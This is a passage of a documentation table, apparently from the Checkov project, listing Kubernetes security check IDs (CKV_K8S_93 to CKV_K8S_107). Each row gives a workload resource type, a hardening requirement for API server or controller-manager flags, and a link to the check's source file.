| CKV_K8S_93 | resource | Pod | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3193 | CKV_K8S_93 | resource | PodTemplate | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3194 | CKV_K8S_93 | resource | ReplicaSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3195 | CKV_K8S_93 | resource | ReplicationController | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3196 | CKV_K8S_93 | resource | StatefulSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3197 | CKV_K8S_94 | resource | CronJob | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3198 | CKV_K8S_94 | resource | DaemonSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | 
[ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3199 | CKV_K8S_94 | resource | Deployment | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3200 | CKV_K8S_94 | resource | DeploymentConfig | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3201 | CKV_K8S_94 | resource | Job | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3202 | CKV_K8S_94 | resource | Pod | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3203 | CKV_K8S_94 | resource | PodTemplate | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3204 | CKV_K8S_94 | resource | ReplicaSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3205 | CKV_K8S_94 | resource | ReplicationController | Ensure that the --audit-log-maxsize argument is set to 100 or as 
appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3206 | CKV_K8S_94 | resource | StatefulSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3207 | CKV_K8S_95 | resource | CronJob | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3208 | CKV_K8S_95 | resource | DaemonSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3209 | CKV_K8S_95 | resource | Deployment | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3210 | CKV_K8S_95 | resource | DeploymentConfig | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3211 | CKV_K8S_95 | resource | Job | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3212 | CKV_K8S_95 | resource | Pod | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | 
[ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3213 | CKV_K8S_95 | resource | PodTemplate | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3214 | CKV_K8S_95 | resource | ReplicaSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3215 | CKV_K8S_95 | resource | ReplicationController | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3216 | CKV_K8S_95 | resource | StatefulSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3217 | CKV_K8S_96 | resource | CronJob | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3218 | CKV_K8S_96 | resource | DaemonSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3219 | CKV_K8S_96 | resource | Deployment | Ensure that the --service-account-lookup argument is set to true | Kubernetes | 
[ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3220 | CKV_K8S_96 | resource | DeploymentConfig | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3221 | CKV_K8S_96 | resource | Job | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3222 | CKV_K8S_96 | resource | Pod | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3223 | CKV_K8S_96 | resource | PodTemplate | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3224 | CKV_K8S_96 | resource | ReplicaSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3225 | CKV_K8S_96 | resource | ReplicationController | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3226 | CKV_K8S_96 | resource | StatefulSet | Ensure that the --service-account-lookup argument is set to true 
| Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3227 | CKV_K8S_97 | resource | CronJob | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3228 | CKV_K8S_97 | resource | DaemonSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3229 | CKV_K8S_97 | resource | Deployment | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3230 | CKV_K8S_97 | resource | DeploymentConfig | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3231 | CKV_K8S_97 | resource | Job | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3232 | CKV_K8S_97 | resource | Pod | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3233 | CKV_K8S_97 | resource | PodTemplate | 
Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3234 | CKV_K8S_97 | resource | ReplicaSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3235 | CKV_K8S_97 | resource | ReplicationController | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3236 | CKV_K8S_97 | resource | StatefulSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3237 | CKV_K8S_99 | resource | CronJob | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3238 | CKV_K8S_99 | resource | DaemonSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3239 | CKV_K8S_99 | resource | Deployment | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | 
[ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3240 | CKV_K8S_99 | resource | DeploymentConfig | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3241 | CKV_K8S_99 | resource | Job | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3242 | CKV_K8S_99 | resource | Pod | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3243 | CKV_K8S_99 | resource | PodTemplate | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3244 | CKV_K8S_99 | resource | ReplicaSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3245 | CKV_K8S_99 | resource | ReplicationController | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3246 | CKV_K8S_99 | resource | StatefulSet | Ensure that the --etcd-certfile and 
--etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3247 | CKV_K8S_100 | resource | CronJob | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3248 | CKV_K8S_100 | resource | DaemonSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3249 | CKV_K8S_100 | resource | Deployment | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3250 | CKV_K8S_100 | resource | DeploymentConfig | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3251 | CKV_K8S_100 | resource | Job | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3252 | CKV_K8S_100 | resource | Pod | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | 
[ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3253 | CKV_K8S_100 | resource | PodTemplate | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3254 | CKV_K8S_100 | resource | ReplicaSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3255 | CKV_K8S_100 | resource | ReplicationController | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3256 | CKV_K8S_100 | resource | StatefulSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | +| 3257 | CKV_K8S_102 | resource | CronJob | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3258 | CKV_K8S_102 | resource | DaemonSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3259 | CKV_K8S_102 | resource | Deployment | Ensure that the --etcd-cafile argument is set as appropriate | 
Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3260 | CKV_K8S_102 | resource | DeploymentConfig | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3261 | CKV_K8S_102 | resource | Job | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3262 | CKV_K8S_102 | resource | Pod | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3263 | CKV_K8S_102 | resource | PodTemplate | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3264 | CKV_K8S_102 | resource | ReplicaSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3265 | CKV_K8S_102 | resource | ReplicationController | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3266 | CKV_K8S_102 | resource | StatefulSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | 
[ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | +| 3267 | CKV_K8S_104 | resource | CronJob | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3268 | CKV_K8S_104 | resource | DaemonSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3269 | CKV_K8S_104 | resource | Deployment | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3270 | CKV_K8S_104 | resource | DeploymentConfig | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3271 | CKV_K8S_104 | resource | Job | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3272 | CKV_K8S_104 | resource | Pod | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3273 | CKV_K8S_104 | resource | PodTemplate | Ensure that encryption providers are appropriately configured | Kubernetes | 
[ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3274 | CKV_K8S_104 | resource | ReplicaSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3275 | CKV_K8S_104 | resource | ReplicationController | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3276 | CKV_K8S_104 | resource | StatefulSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | +| 3277 | CKV_K8S_105 | resource | CronJob | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3278 | CKV_K8S_105 | resource | DaemonSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3279 | CKV_K8S_105 | resource | Deployment | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3280 | CKV_K8S_105 | resource | DeploymentConfig | 
Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3281 | CKV_K8S_105 | resource | Job | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3282 | CKV_K8S_105 | resource | Pod | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3283 | CKV_K8S_105 | resource | PodTemplate | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3284 | CKV_K8S_105 | resource | ReplicaSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3285 | CKV_K8S_105 | resource | ReplicationController | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3286 | CKV_K8S_105 | resource | StatefulSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | 
[ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | +| 3287 | CKV_K8S_106 | resource | CronJob | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3288 | CKV_K8S_106 | resource | DaemonSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3289 | CKV_K8S_106 | resource | Deployment | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3290 | CKV_K8S_106 | resource | DeploymentConfig | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3291 | CKV_K8S_106 | resource | Job | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3292 | CKV_K8S_106 | resource | Pod | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | 
[KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3293 | CKV_K8S_106 | resource | PodTemplate | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3294 | CKV_K8S_106 | resource | ReplicaSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3295 | CKV_K8S_106 | resource | ReplicationController | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3296 | CKV_K8S_106 | resource | StatefulSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) | +| 3297 | CKV_K8S_107 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | 